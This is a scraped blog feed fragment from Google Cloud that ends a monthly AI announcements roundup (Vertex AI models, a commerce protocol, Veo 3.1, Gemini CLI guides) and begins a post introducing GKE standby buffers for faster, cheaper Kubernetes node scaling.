&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/expanding-vertex-ai-with-claude-opus-4-6"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Announcing Claude Opus 4.6 and Claude Sonnet 4.6 on Vertex AI:&lt;/strong&gt;&lt;/a&gt; &lt;span style="vertical-align: baseline;"&gt;Now generally available on Vertex AI, explore our &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/vertex-ai-samples/blob/main/notebooks/official/generative_ai/anthropic_claude_intro.ipynb" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;sample notebook&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to get started and visit our &lt;/span&gt;&lt;a href="https://cloud.google.com/vertex-ai/generative-ai/pricing#claude-models"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for comprehensive pricing and regional availability details.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-new-ai-threats-report-distillation-experimentation-integration"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;New AI threats report: Distillation, experimentation, and integration&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: John Hultquist, chief analyst, Google Threat Intelligence Group, details what security leaders should know from our newest AI threat report on experimentation, integration, and distillation attacks.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;News you can use&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/a-devs-guide-to-production-ready-ai-agents"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;A developer's guide to production-ready AI agents&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;To help developers work through these challenges, we've published a collection of guides covering the full agent lifecycle. These resources first appeared during Kaggle’s &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/developers-tools/ai-agents-intensive-recap/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;5 days of AI Agents Intensive&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and they’ve proven so popular and useful, we wanted to make sure a wider audience had access, as well. &lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/gear-program-now-available"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Ready (GEAR) program now available:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We opened the Gemini Enterprise Agent Ready (GEAR) learning program to everyone. As a new specialized pathway within the Google Developer Program, GEAR empowers developers and pros to build and deploy enterprise-grade agents with Google AI.&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/provisioned-throughput-on-vertex-ai"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Your guide to Provisioned Throughput (PT) on Vertex AI:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Check out this deep-dive blog designed to show you the resources available to you today on Vertex AI, and how you can get started capacity planning. &lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/transform/how-ai-can-boost-defenders-from-defense-in-depth-to-cyber-kill-chain-qa"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;How AI can boost defenders, from defense in depth to the cyber kill chain (Q&amp;amp;A)&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;We know that defenders are also developing powerful AI tools, but what’s still unknown is what it could mean for enterprise software ownership if companies have to constantly mount AI-directed defenses at AI-powered attacks?&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built. &lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;hr/&gt;
&lt;h2 style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;Janurary&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We used to have to learn the language of computers. In 2026, they’re learning ours.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We kicked off the year by exploring the future of agentic commerce, where AI agents navigate the web to find and buy products for us. Our leaders call this the "&lt;/span&gt;&lt;a href="https://cloud.google.com/transform/the-invisible-shelf-retail-cpg-agentic-commerce-how-to?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;invisible shelf&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;" — a world where commerce isn't tied to a specific website. To make this reality scalable, we announced the Universal Commerce Protocol (UCP), a shared language that allows agents and retailers to understand each other. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We brought that same fluency to our creative and technical tools:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Updates to Veo 3.1 allow creators to use simple inputs — like reference images — to generate precise, mobile-ready video.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Natural language queries: With Comments to SQL in BigQuery, we’re removing the language barrier to data. Engineers can now write queries by describing their intent in natural language, prioritizing the question over the code.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let’s dive in.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Top hits &lt;/span&gt;&lt;/h3&gt;
&lt;p role="presentation"&gt;1. &lt;a href="https://www.googlecloudpresscorner.com/2026-01-11-Google-Cloud-Brings-Shopping-and-Customer-Service-Together-with-Gemini-Enterprise-for-Customer-Experience" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise for Customer Experience (CX):&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Specifically built for agentic retail, this platform transforms fragmented search, commerce and service touch points into one seamless journey — whether you need a shopping assistant, a support bot, agentic search or help with merchandising. &lt;/span&gt;&lt;/p&gt;
&lt;p role="presentation"&gt;2. &lt;a href="https://developers.googleblog.com/under-the-hood-universal-commerce-protocol-ucp/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;We announced Universal Commerce Protocol (UCP):&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;A new open standard for agentic commerce that works across the entire shopping journey — from discovery and buying to post-purchase support. UCP establishes a common language for agents and systems to operate together across consumer surfaces, businesses and payment providers. So instead of requiring unique connections for every individual agent, UCP enables all agents to interact easily. UCP is built to work across verticals and is compatible with existing industry protocols like Agent2Agent (A2A), Agent Payments Protocol (AP2) and Model Context Protocol (MCP).&lt;/span&gt;&lt;/p&gt;
&lt;p role="presentation"&gt;3. &lt;a href="https://blog.google/innovation-and-ai/technology/ai/veo-3-1-ingredients-to-video/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;We updated Veo 3.1, including improvements to Ingredients to Video and Portrait mode:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Veo is getting more expressive, with improvements that help you create more fun, creative, high-quality videos based on ingredient images, built directly for the mobile format. This includes:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Improvements to Veo 3.1 Ingredients to Video, our capability that lets you create videos based on reference images. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Native vertical outputs for Ingredients to Video (portrait mode) to power mobile-first, short-form video creation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;State-of-the-art upscaling to 1080p and 4K resolution 1 for high-fidelity production workflows.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These updates are launching in the Gemini app, YouTube, Flow, Google Vids, the Gemini API and Vertex AI.&lt;/span&gt;&lt;/p&gt;
&lt;p role="presentation"&gt;4. &lt;a href="https://cloud.google.com/blog/products/data-analytics/vibe-querying-with-comments-to-sql-in-bigquery?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Vibe querying with comments-to-SQL:&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; Crafting complex SQL queries can be challenging. Often, engineers simply want to express their data needs in plain English directly within their SQL workflow. That’s why we’re introducing Comments to SQL in BigQuery. This feature makes writing queries using natural language – ‘vibe querying’ – a reality. Learn more in the &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/vibe-querying-with-comments-to-sql-in-bigquery?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;News you &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;can&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; use&lt;/span&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/mastering-gemini-cli-your-complete-guide-from-installation-to-advanced-use-cases?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Mastering Gemini CLI: Your complete guide from installation to advanced use-cases&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We’ve teamed up with DeepLearning.ai and are excited to announce a free course – Gemini CLI: Code &amp;amp; Create with an Open-Source Agent. This course isn’t just for developers; we dive into practical use cases for various tasks such as data analysis, content creation, and personalized learning.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/how-google-sres-use-gemini-cli-to-solve-real-world-outages?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;How Google SREs use Gemini CLI to solve real-world outages&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In this article, we’ll delve into real scenarios that Google SREs are solving today using Gemini 3 (our latest foundation model) and Gemini CLI—the go-to tool for bringing agentic capabilities to the terminal.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/getting-started-with-gemini-3-deploy-your-first-gemini-3-app-to-google-cloud-run?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Getting started with Gemini 3: Deploy your first Gemini 3 app to Google Cloud Run&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, we will show you how to vibe code your first app—which leverages the Gemini 3 Flash Preview model and deploy it as a publicly accessible URL on Google Cloud Run. Google AI Studio lets you go from idea to app quickly by using natural language to generate fully functional apps using the power of Gemini 3.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-practical-guidance-building-with-SAIF"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Practical guidance: Building with the Secure AI Framework (SAIF) on Google Cloud&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We know that security and data privacy are the top concern for executives when evaluating AI providers, and security is the top use case for AI agents in a majority of industries. To help you build AI boldly and responsibly, here’s our guide to developing AI with the Secure AI Framework (SAIF) on Google Cloud. &lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/transform/truths-about-ai-hacking-every-ciso-needs-to-know-qa"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;The truths about AI hacking that every CISO needs to know (Q&amp;amp;A)&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; How will AI boost threat actors? And what can chief information security officers do about it? Google’s Heather Adkins, vice-president, Security Engineering, explores how securing the enterprise is about to change.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-related_article_tout"&gt;





&lt;div class="uni-related-article-tout h-c-page"&gt;
  &lt;section class="h-c-grid"&gt;
    &lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/what-google-cloud-announced-in-ai-this-month-2025/"
       data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }'
       class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker"&gt;
      &lt;div class="uni-related-article-tout__inner-wrapper"&gt;
        &lt;p class="uni-related-article-tout__eyebrow h-c-eyebrow"&gt;Related Article&lt;/p&gt;

        &lt;div class="uni-related-article-tout__content-wrapper"&gt;
          &lt;div class="uni-related-article-tout__image-wrapper"&gt;
            &lt;div class="uni-related-article-tout__image" style="background-image: url('https://storage.googleapis.com/gweb-cloudblog-publish/images/monthly_ai_news.max-500x500.png')"&gt;&lt;/div&gt;
          &lt;/div&gt;
          &lt;div class="uni-related-article-tout__content"&gt;
            &lt;h4 class="uni-related-article-tout__header h-has-bottom-margin"&gt;What Google Cloud announced in AI this month - 2025&lt;/h4&gt;
            &lt;p class="uni-related-article-tout__body"&gt;Learn about the latest announcements, innovations, and guides when it comes to Google Cloud AI.&lt;/p&gt;
            &lt;div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted"&gt;
              &lt;span class="nowrap"&gt;Read Article
                &lt;svg class="icon h-c-icon" role="presentation"&gt;
                  &lt;use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"&gt;&lt;/use&gt;
                &lt;/svg&gt;
              &lt;/span&gt;
            &lt;/div&gt;
          &lt;/div&gt;
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;/section&gt;
&lt;/div&gt;

&lt;/div&gt;</description><pubDate>Mon, 01 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/ai-machine-learning/what-google-cloud-announced-in-ai-this-month/</guid><category>Google Cloud</category><category>AI &amp; Machine Learning</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/google_ai_this_month.max-600x600.jpg" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>What Google Cloud announced in AI this month</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/google_ai_this_month.max-600x600.jpg</image><site_name>Google</site_name><url>https://cloud.google.com/blog/products/ai-machine-learning/what-google-cloud-announced-in-ai-this-month/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Andrea Sanin</name><title>AI Editor, Google Cloud</title><department></department><company></company></author></item><item><title>Introducing the GKE standby buffer: Improve node startup times without blowing your budget</title><link>https://cloud.google.com/blog/products/containers-kubernetes/gke-standby-buffers-speed-up-autoscaling-for-less-spend/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Application owners and platform engineers have long faced a difficult choice: spend excessively by over-provisioning to guarantee quick startups, or minimize costs but endure slow cold starts.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are excited to announce a solution to this compromise: &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Google Kubernetes Engine standby buffers. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;This&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;builds on the launch of &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/containers-kubernetes/new-gke-active-buffer-minimizes-scale-out-latency"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GKE active buffers&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; earlier this year,&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; a native version of the Kubernetes &lt;/span&gt;&lt;a href="https://github.com/kubernetes/autoscaler/pull/8151/commits/0ffe04d1136f50eed0be6cd7910701bf3bacedcb" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CapacityBuffers API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that makes it easy to provision readily available capacity to handle traffic spikes, delivering near-zero startup latency for new pods. However, active buffers still impose a trade-off between performance and cost. New GKE standby buffers help by maintaining a low-cost, suspended capacity buffer for your GKE clusters. With a cost overhead in the low single-digit percent, GKE standby buffers help you achieve near-immediate scheduling for your workloads &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;with negligible cost overhead. This is useful for all kinds of workloads — general-purpose, agentic, and everything in between.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_cMBIfl7.max-1000x1000.png"
        
          alt="1"&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="yoa6n"&gt;Under identical traffic loads, the cluster without standby buffers suffered severe latency spikes, with P50, P95, and P99 metrics trapped between 4 and 6 minutes. Conversely, the cluster with standby buffers maintained a P50 latency of just single-digit seconds, while its P95 and P99 metrics briefly peaked at one minute before quickly normalizing to single-digit seconds. Both setups exhibited a similar allocatable core cost, making the buffered approach far more efficient.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The problem: High costs and latency&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Traditionally, autoscaling with standard Kubernetes has been effective but slow. Traffic surges or batch jobs require cluster autoscalers to provision fresh nodes, leaving Pods in a pending state. To circumvent delays, you have to resort to clunky workarounds like lowering your Horizontal Pod Autoscaler (HPA) thresholds or managing so-called balloon pods. These workarounds are expensive: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Managing balloon pods is operationally complex, requiring manual configuration and ongoing maintenance of priority classes and resource requests to ensure they function correctly.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Lowering the HPA threshold adds empty (wasted) space that linearly scales with the size of the node pool.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Both GKE active and standby buffers allow capacity to be defined declaratively, removing the need for clunky and operationally heavy workarounds.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In addition, GKE standby buffers lower infrastructure costs by storing the node’s state to disk, releasing compute and memory costs and keeping only persistent disk and IP address costs. Then, combined with an active buffer, you can achieve near-instant pod scheduling that has similar performance to over-provisioning, but at a very affordable price.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee"
      href="https://youtube.com/watch?v=wxsXoBbBHCI"
      data-glue-modal-trigger="uni-modal-wxsXoBbBHCI-"
      data-glue-modal-disabled-on-mobile="true"&gt;

      
        

        &lt;div class="article-video__aspect-image"
          style="background-image: url(https://storage.googleapis.com/gweb-cloudblog-publish/images/maxresdefault_YqJL5fN.max-1000x1000.jpg);"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Introducing GKE Capacity Buffers - the native Kubernetes way to achieve low latency pod scheduling&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg role="img" class="h-c-video__play h-c-icon h-c-icon--color-white"&gt;
        &lt;use xlink:href="#mi-youtube-icon"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"
     data-glue-modal="uni-modal-wxsXoBbBHCI-"
     data-glue-modal-close-label="Close Dialog"&gt;
   &lt;a class="glue-yt-video"
      data-glue-yt-video-autoplay="true"
      data-glue-yt-video-height="99%"
      data-glue-yt-video-vid="wxsXoBbBHCI"
      data-glue-yt-video-width="100%"
      href="https://youtube.com/watch?v=wxsXoBbBHCI"
      ng-cloak&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Active and standby buffers working together&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;All GKE capacity buffers operate on a principle similar to video streaming on platforms like YouTube. By proactively attempting to provision and manage available capacity ahead of &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;impending&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; demand (much like pre-downloading video content) GKE helps to ensure that resources are readily available when they’re needed.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With today’s launch, the two types of capacity buffers can work in harmony:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Active buffer:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Cluster Autoscaler works to reserve enough capacity for a predefined amount of pods on existing cluster nodes, and, if needed, provisions extra nodes. Select this ready-to-use buffer to provide capacity to your most latency-sensitive workloads. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Standby buffers:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Nodes are pre-provisioned and fully initialized with necessary components like Kubernetes DaemonSets, and given time to &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/configure-capacity-buffer#preload-images"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;preload images&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, but are then suspended, while the underlying compute capacity is released to save costs. When demand spikes, these nodes resume 2-3x faster than creating a fresh node, bridging the gap between cold starts and always-on capacity.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The active buffer covers the initial spike until standby buffers resume. The system prioritizes refilling the active buffer from the standby buffer. The standby buffer handles an extended load and protects against slower node cold starts. As standby buffers refill, they initially kick into an active state for a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/configure-capacity-buffer#customize-standby-behavior"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;configurable amount of time&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; before they are suspended, providing a boost of active capacity during sustained traffic loads.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Early benchmarks&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In our tests, using standby buffers enabled us to deliver sub-second &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/machine-learning/agent-sandbox"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Sandbox&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; scheduling latency for up to 90% lower cost compared to complete overprovisioning.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_GKE_Buffers_Cloud_Metrics.max-1000x1000.jpg"
        
          alt="2 GKE Buffers Cloud Metrics"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Optimized for business needs&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Businesses are under constant pressure to optimize resource consumption while streamlining operations. Recognizing that organizations need smarter tools to manage sporadic and spikey workloads, we worked hard to deliver standby buffers quickly. Now, whether you’re running agents, batch jobs, CI/CD pipelines, game servers, or spiky workloads, GKE capacity buffers allow you to dynamically balance performance and cost. You can finally define your "insurance policy" against traffic spikes without paying a high premium for it. With GKE standby buffers you can:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Circumvent cold starts:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Nodes suspended by standby buffers resume 2-3x faster than provisioning fresh nodes, reducing pod scheduling latency during traffic spikes and sustained traffic load.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Enjoy lower costs:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; A standby buffer incurs a fraction of the cost of active capacity because the underlying VM is suspended. You pay for storage and an IP address, rather than for full compute-hours.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
